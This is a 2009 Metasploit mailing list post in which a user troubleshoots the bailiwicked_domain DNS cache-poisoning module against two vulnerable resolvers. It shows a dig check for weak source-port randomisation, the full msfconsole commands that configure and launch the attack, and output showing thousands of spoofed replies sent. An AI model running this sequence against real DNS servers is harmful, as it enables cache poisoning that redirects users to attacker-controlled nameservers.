Metasploit mailing list archives

bailiwicked_domain not working anymore?

From: richard.k.miles at googlemail.com (Richard Miles)
Date: Mon, 20 Jul 2009 09:58:09 -0500

Yo

I recently tested the bailiwicked_domain exploit from Metasploit
against 2 different servers, and both failed the exploitation.

Both servers show to be vulnerable, similar to this one output:

porttest.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"myDNSserver is POOR: 26 queries in 1.9 seconds from 26 ports with std dev 7"

I used this test:

dig +short porttest.dns-oarc.net TXT @myDNSserver

Both DNS servers show to be vulnerable (POOR).

When exploit with Metasploit, the first problem is that "check" always
fail saying my DNS doesn't accept recursive queries.

msf auxiliary(bailiwicked_domain) > check

[*] Using the Metasploit service to verify exploitability...
[*] ERROR: This server is not replying to recursive requests

That is completely wrong, my server accept recursive queries. Even if
I quit metasploit or even open another terminal I can query ANY host
in the internet. Is it a know problem?

Well, anyway I tried to exploit the flaw, using this:

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST myDNSserver
RHOST => myDNSserver
msf auxiliary(bailiwicked_domain) > set DOMAIN sexy.com
DOMAIN => sexy.com
msf auxiliary(bailiwicked_domain) > set NEWDNS www.google.com
NEWDNS => www.google.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > exploit

[*] Targeting nameserver myDNSserver for injection of sexy.com.
nameservers as www.google.com
[*] Querying recon nameserver for sexy.com.'s nameservers...
[*]  Got an NS record: XXXXXXXXXXXXXXXX
[*]     Removed: It's just DNS resolution.
[*] Calculating the number of spoofed replies to send per query...
[*]   race calc: 100 queries | min/max/avg time: 0.04/0.17/0.07 |
min/max/avg replies: 4/67/28
[*] Sending 14 spoofed replies from each nameserver (3) for each query
[*] Attempting to inject poison records for sexy.com.'s nameservers
into myDNSserver:0...
[*] Sent 1000 queries and 42000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*]   race calc: 25 queries | min/max/avg time: 0.04/103.53/4.22 |
min/max/avg replies: 3/65337/2633
[*] Now sending 1316 spoofed replies from each nameserver (3) for each query

And the Metasploit keeps in this stage for a long time (at the moment,
more than 1 hour).

There is anything wrong with the exploit? Or I'm using it wrong?

I'm following this tutorial:

http://www.caughq.org/exploits/CAU-EX-2008-0003.txt

Any tips are welcome.

thanks